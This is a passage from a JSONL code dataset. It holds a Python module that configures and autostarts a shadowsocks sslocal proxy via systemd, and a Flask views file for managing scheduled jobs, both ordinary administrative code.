加上msg以后会把信息打印到测试报告中","repo_name":"testzhaoxudong/API_auto_day2","sub_path":"testcase/test_lesson.py","file_name":"test_lesson.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8385320314","text":"import os\nimport json\nfrom pyplus.subprocess import shell\n\n_SSLOCAL_SERVICE = 'sslocal.service'\n\n\ndef _get_sslocal_path(): return shell.run('which sslocal', output='single')\n\n\ndef stop():\n ret = shell.run('systemctl stop {}'.format(_SSLOCAL_SERVICE))\n if isinstance(ret, shell.CmdRunError): raise Exception(str(ret))\n\n\ndef start():\n # start sslocal\n ret = shell.run('systemctl start {}'.format(_SSLOCAL_SERVICE))\n if isinstance(ret, shell.CmdRunError): raise Exception(str(ret))\n\n\ndef pid():\n ret = shell.run(\"ps -ef | grep sslocal | grep -v grep | awk '{print $2}'\", output='single')\n if isinstance(ret, shell.CmdRunError): raise Exception(str(ret))\n\n try:\n return int(ret)\n except:\n return -1\n\n\n\ndef load_config(path):\n with open(path, 'r') as f:\n config = json.load(f)\n return config\n\n\ndef gen_config(config_path,\n server, server_port, password,\n local_address=\"127.0.0.1\", local_port=1080,\n timeout=300, method=\"AES-256-CFB\"):\n cfg = {\n \"server\": server,\n \"server_port\": server_port,\n \"local_address\": local_address,\n \"local_port\": local_port,\n \"password\": password,\n \"timeout\": timeout,\n \"method\": method\n }\n\n # create path\n os.makedirs(os.path.dirname(config_path), exist_ok=True)\n\n # delete old file\n if os.path.isfile(config_path): os.remove(config_path)\n\n # create new file\n with open(config_path, 'w+') as f:\n json.dump(cfg, f, indent=4)\n\n return cfg\n\n\n\ndef enable_autostart():\n ret = shell.run('systemctl enable {}'.format(_SSLOCAL_SERVICE))\n if isinstance(ret, shell.CmdRunError): raise Exception(str(ret))\n\n\ndef disable_autostart():\n ret = shell.run('systemctl disable {}'.format(_SSLOCAL_SERVICE))\n if isinstance(ret, shell.CmdRunError): raise Exception(str(ret))\n\n\ndef add_autostart(ss_config_path):\n\n service_content = '[Unit] \\n' + \\\n 'Description=sslocal \\n' +\\\n 'After=network.target \\n' + \\\n '\\n' + \\\n '[Service] \\n' + \\\n 'Type=forking \\n' + \\\n 'ExecStart={} -c {} -d start \\n'.format(_get_sslocal_path(), ss_config_path) + \\\n 'ExecStop={} -c {} -d stop \\n'.format(_get_sslocal_path(), ss_config_path) + \\\n '\\n' + \\\n '[Install] \\n' + \\\n 'WantedBy=multi-user.target \\n'\n\n\n\n service_path = os.path.join('/etc/systemd/system', _SSLOCAL_SERVICE)\n with open(service_path, 'w') as f:\n f.write(service_content)\n\n # reload\n ret = shell.run('systemctl daemon-reload')\n if isinstance(ret, shell.CmdRunError): raise Exception(str(ret))\n\n # set autostart\n enable_autostart()\n\n # restart\n stop()\n start()\n\n\n\ndef bug_fix():\n import shadowsocks\n ss_path = os.path.dirname(shadowsocks.__file__)\n openssl_file = os.path.join(ss_path, 'crypto', 'openssl.py')\n\n with open(openssl_file, 'r') as f:\n content = f.read()\n\n with open(openssl_file, 'w+') as f:\n content = content.replace('cleanup', 'reset')\n f.write(content)\n","repo_name":"tornadoyi/gfwproxy","sub_path":"gfwproxy/ss.py","file_name":"ss.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8267382636","text":"# -*- coding: utf-8 -*-\n# @Author: guomaoqiu\n# @File Name: views.py\n# @Date: 2019-03-12 17:28:21\n# @Last Modified by: guomaoqiu\n# @Last Modified time: 2019-03-26 16:50:33\n\nfrom . import job\nfrom .. import scheduler\nfrom flask import request, jsonify, Response\nimport json\nfrom .. import db\nfrom ..models import TaskLog\nfrom flask_login import login_required\n\nfrom .public import DateEncoder\nfrom .core import jobfromparm, get_job_logs\n\n@job.route('/pause',methods=['POST'])\n@login_required\ndef pause_job():\n '''暂停作业'''\n print(request)\n response = {'status': False}\n try:\n data = request.get_json(force=True)\n print (data)\n job_id = data.get('id')\n print(job_id)\n scheduler.pause_job(job_id)\n response['msg'] = \"job[%s] pause success!\"%job_id\n response['status'] = True\n except Exception as e:\n response['msg'] = str(e)\n return jsonify(response)\n \n\n@job.route('/resume',methods=['POST'])\n@login_required\ndef resume_job():\n '''恢复作业'''\n response = {'status': False}\n try:\n data = request.get_json(force=True)\n job_id = data.get('id')\n scheduler.resume_job(job_id)\n response['msg'] = \"job[%s] resume success!\"%job_id\n response['status'] = True\n except Exception as e:\n response['msg'] = str(e)\n return jsonify(response)\n\n@job.route('/remove',methods=['DELETE'])\n@login_required\ndef reomve_jobs():\n '''删除作业'''\n response = {'status': False}\n try:\n data = request.get_json(force=True)\n job_id = data.get('id')\n if job_id != 'all':\n scheduler.remove_job(job_id)\n response['msg'] = \"job [%s] remove success!\"%job_id\n else:\n scheduler.remove_all_jobs()\n response['msg'] = \"job all remove success!\"\n response['status'] = True\n except Exception as e:\n response['msg'] = str(e)\n return jsonify(response)\n\n@job.route('/edit', methods=['POST'])\n@login_required\ndef edit_job():\n '''修改作业'''\n response = {'status': '-1'}\n try:\n data = request.get_json(force=True)\n job_id = data.get('id')\n old_job = scheduler.get_job(job_id)\n if old_job:\n jobfromparm(scheduler,**data)\n response['status'] = 0\n response['message'] = \"job[%s] edit success!\"%job_id\n else:\n response['message'] = \"job[%s] Not Found!\"%job_id\n except Exception as e:\n response['message'] = str(e)\n return json.dumps(response)\n\n@job.route('/add', methods=['POST'])\n@login_required\ndef add_job():\n '''新增作业'''\n response = {'status': '-1'}\n try:\n data = request.get_json(force=True)\n print (data)\n job_id = jobfromparm(scheduler,**data)\n print (job_id) \n response['status'] = 0\n response['msg'] = \"job [%s] add success!\"%job_id\n response['result'] = True\n except Exception as e:\n response['msg'] = str(e)\n print(e)\n return jsonify(response) \n\n@job.route('/show_jobs/', methods=['GET'])\n@login_required\n\ndef show_jobs():\n '''获取所有jobs信息'''\n response = {}\n try:\n # 获取单个计划任务详情,如果有传入id则为单个;否则为所有\n jid = request.args.get('id')\n if jid == None:\n ret_list = scheduler.get_jobs()\n\n else:\n ret_list = [scheduler.get_job(jid)]\n info_list = []\n\n for ret in ret_list:\n\n # 判断任务类型是否为 cron\n if \"cron\" in str(ret.trigger):\n cron = {}\n fields = ret.trigger.fields\n for field in fields:\n \n cron[field.name] = str(field)\n cron_list = [cron['second'],cron['minute'],cron['hour'],cron['day'],cron['month'],cron['day_of_week']]\n info = {\n 'id':ret.id,\n 'next_run_time':ret.next_run_time,\n 'cmd':ret.kwargs.get('cmd'),\n 'func':ret.func_ref,\n 'status':\"

Runing...

\" \\\n if ret.next_run_time != None else \\\n \"

Pause...

\",\n 'cron':' '.join(cron_list)\n }\n info_list.append(info) \n\n\n # 判断任务类型是否为 date \n if \"date\" in str(ret.trigger):\n info = {\n\n 'id':ret.id,\n 'next_run_time':ret.next_run_time,\n 'cmd':ret.kwargs.get('cmd'),\n 'func':ret.func_ref,\n 'status':\"

Runing...

\" \\\n if ret.next_run_time != None else \\\n \"

Pause...

\",\n 'cron': ret.trigger.run_date\n }\n info_list.append(info)\n\n # 判断任务类型是否为 interval\n if \"interval\" in str(ret.trigger):\n #print (ret.kwargs.get(\"end_date\"))\n #fields = ret.kwargs\n timedelta_seconds = ret.trigger.interval_length\n #print(type(fields))\n info = {\n 'id':ret.id,\n 'next_run_time':ret.next_run_time,\n 'cmd':ret.kwargs.get('cmd'),\n 'func':ret.func_ref,\n 'status':\"

Runing...

\" \\\n if ret.next_run_time != None else \\\n \"

Pause...

\",\n 'cron': str(ret.trigger.interval_length) + \"s / run\"\n }\n info_list.append(info)\n #print(info_list) \n response['status'] = True\n response['data'] = info_list\n response['count'] = len(info_list)\n \n except Exception as e:\n response['msg'] = str(e)\n result = json.dumps(response,cls=DateEncoder)\n\n return result\n\n@job.route('/job_log', methods=['GET'])\n@login_required\ndef job_log():\n '''获取所有job log信息'''\n response = {}\n try:\n db_id = request.args.get('id')\n if db_id != None:\n result = db.session.query(TaskLog).filter_by(id=db_id).first()\n ret = result.to_json()['stdout']\n return jsonify({\"stdout\": ret})\n else: \n ret = get_job_logs(request.args)\n response['status'] = 0\n response['data'] = ret\n response['count'] = len(ret)\n except Exception as e:\n response['msg'] = str(e)\n\n return json.dumps(response,cls=DateEncoder)","repo_name":"guomaoqiu/JobCenter","sub_path":"app/job/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7217,"program_lang":"python","lang":"en","doc_type":"code","stars":194,"dataset":"github-code","pt":"52"}